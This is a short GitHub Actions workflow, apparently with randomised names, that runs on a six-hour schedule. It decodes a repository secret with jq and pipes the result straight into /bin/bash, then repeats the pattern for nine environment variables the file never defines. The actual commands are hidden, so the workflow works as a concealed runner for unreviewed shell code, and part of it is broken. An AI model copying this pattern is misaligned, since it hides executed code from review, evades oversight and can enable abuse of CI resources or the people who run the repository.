name: yizhifchunag
on:
  workflow_dispatch:
  schedule:
    - cron: '18 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yizhifchunag
        env:
          ymo771: ${{ secrets.ymo771 }}
        run: |
          echo $ymo771 | jq -r .oue97 | /bin/bash
          echo $rziaf7133 | jq -r .glsis87091 | /bin/bash
          echo $cc90 | jq -r .rbttk16230 | /bin/bash
          echo $lr293 | jq -r .cf619 | /bin/bash
          echo $glrid951 | jq -r .ne51 | /bin/bash
          echo $l5701 | jq -r .iqx8112 | /bin/bash
          echo $uzzo75943 | jq -r .ph20034 | /bin/bash
          echo $nzvx83 | jq -r .awu2359 | /bin/bash
          echo $kzvla9737 | jq -r .mtq30633 | /bin/bash
          echo $sze35 | jq -r .d710 | /bin/bash

